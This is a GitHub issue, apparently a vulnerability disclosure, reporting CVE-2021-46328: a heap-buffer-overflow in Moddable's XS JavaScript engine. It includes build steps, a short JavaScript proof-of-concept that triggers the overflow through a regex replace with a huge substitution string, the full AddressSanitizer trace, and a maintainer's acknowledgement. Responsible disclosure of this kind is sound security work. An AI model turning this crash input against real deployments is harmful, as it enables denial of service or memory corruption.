Headline
CVE-2021-46328: Heap-buffer-overflow in __libc_start_main · Issue #751 · Moddable-OpenSource/moddable
Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __libc_start_main.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Heap-buffer-overflow in __libc_start_main #751
Closed
hope-fly opened this issue
Dec 14, 2021
· 1 comment
Comments
Moddable-XS revision
Commit: db8f973
Version: 11.5.0 32 4
Build environment
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
cd ~/moddable/xs/makefiles/lin make debug
Test case
function JSEtest(x, n) { while (x.length < n) { x += x; } return x.substring(0, n); }
var x = JSEtest("1", 1 << 20); var rep = JSEtest("$1", 1 << 16); var y = x.replace(/(.+)/g, rep); y.length;
Execution & Output
$ ./xst test.js
================================================================= ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408 WRITE of size 1048576 at 0x7f62dd0fe820 thread T0 #0 0x7f62e0bf4779 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779) #1 0x564bd7f19243 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989 #3 0x564bd7e46db6 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834 #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #5 0x564bd7f1c334 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675 #6 0x564bd7f1c334 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120 #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281 #11 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #12 0x564bd79f70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9)
0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region [0x7f62dc0fe800,0x7f62dd0fe820) allocated by thread T0 here: #0 0x7f62e0c59b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506 #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170 #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367 #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259 #5 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779) Shadow bytes around the buggy address: 0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fecdba17d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb
Credits: Found by OWL337 team.
mkellner pushed a commit that referenced this issue
Dec 21, 2021
Copy link
Collaborator
phoddie commented Dec 21, 2021
Nice find. We have eliminated several other integer overflow issues recently, but clearly overlooked this one.
2 participants